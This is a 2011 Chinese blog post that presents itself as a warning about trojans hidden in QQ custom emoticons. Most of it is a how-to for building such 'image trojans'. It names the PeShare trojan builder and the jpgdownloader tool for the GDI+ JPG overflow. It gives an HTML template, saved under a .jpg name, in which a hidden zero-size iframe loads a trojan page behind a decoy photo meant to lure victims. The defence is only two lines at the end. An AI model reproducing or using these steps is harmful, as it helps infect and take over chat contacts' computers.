分享

提防QQ表情背后的阴谋--追踪盗号尾巴

 yjj0691 2011-06-15

提防QQ表情背后的阴谋--追踪盗号尾巴1

网友发送flash动画的阴谋

相信QQ是广大网友都非常熟悉的聊天工具了。有相当一部分朋友对QQ表情十分喜爱,甚至自己制作个性化的自定义表情共享给大家。但是我们在享受各种个性化表情的时候,黑客也会通过这些表情图片悄悄进入我们的计算机种植木马,让我们防不胜防。我们应该如何应对?下面我就来个破解。
4月2号,就是我去考试的那天,一位一年不见的好友突然来电话,他说,今天游戏上突然有人加他,并说和他同个地方的,是个PP的MM,还互加QQ,给他发了照片。当时也没有注意什么,用的卡巴也没有响。只是觉得这MM好漂亮啊,要是……(省了200字都是他口水)。
没想到第二天打开电脑没多久,他就觉得电脑越来越慢,通过瑞星卡巴等杀毒软件并没有发现可疑的程序。后来系统竟然慢到假死现象。于是他重新安装系统,格式化了系统盘,依然没有效果。听到这,我就十分警觉的做了一个虚拟系统,让他把系统共享给我看。
果然,在QQ的自定义表情中,找到了那MM的照片,另外几个表情也带有木马。原来,QQ的自定义表情竟成黑客入侵通道。
一个小小的QQ如何被黑客利用成为入侵电脑的通道呢?其实QQ自定义表情传送的就是图片,那么也就容易理解这其实就是一个运用图片种植木马的伎俩。
QQ自客义表情传送的实质上就是图片,这些经过加工的图片再发给远程用户以后,图片首选会判断系统是否存在相应的漏洞。如果存在漏洞分块,图片就会激活这个漏洞,然后执行图片所带的恶意代码,从而最终成为控制远程计算机。
知道这个原理后,我来讲一下这个木马的制作过程。
首先以国产木马PeShare为例。运行PeShare.exe后,会打开一个配置的窗口,随便设置后,点击生成,随后发送到已经申请好的网上空间中。
然后有两种方法可以生成图片木马。
1利用漏洞生成
这种方法是通过windows系统以及应用程序的漏洞而产生,比如2004年的"windows GDI+JPG解析组件缓冲区溢出漏洞"、"windows图形渲染引擎安全漏洞",2005年的"MSN Messenger PNG图片解析远种代码执行漏洞",以及今年的"windows图形渲染引擎WMF格式代码执行漏洞"都是和图形图像有关的漏洞。
下面就以GDI+JPG为例,在命令提示符下激活漏洞利用工具jpglowder,查看工具便用方法。漏洞利用工会包含了多个命令参数。
要利用这个漏洞生成图片木马,只要便用工会内置参数d就可,通过输入一段含有木马的网页链接,就可以生成需要的图片木马。
2利用网页代码
这个比较容易,打开记事本,打入以下代码,另存为plmm.jpg(就是漂亮MM照片啦)。
代码如下:
<html>
<body>
<iframe src="网页木马地址" width="0" height="0" frameborder="0">
</iframe>
<center><img src="真实图片地址"></img></center>
</body>
</html>
这里只要一个跳转命令就可以入侵木马了,真可怕。

防范方法嘛。。。。。。。
快去www.microsoft.com下载补丁包吧。。
要不然就设置QQ不接收自定义图片好了。。

    本站是提供个人知识管理的网络存储空间,所有内容均由用户发布,不代表本站观点。请注意甄别内容中的联系方式、诱导购买等信息,谨防诈骗。如发现有害或侵权内容,请点击一键举报。
    转藏 分享 献花(0

    0条评论

    发表

    请遵守用户 评论公约

    类似文章 更多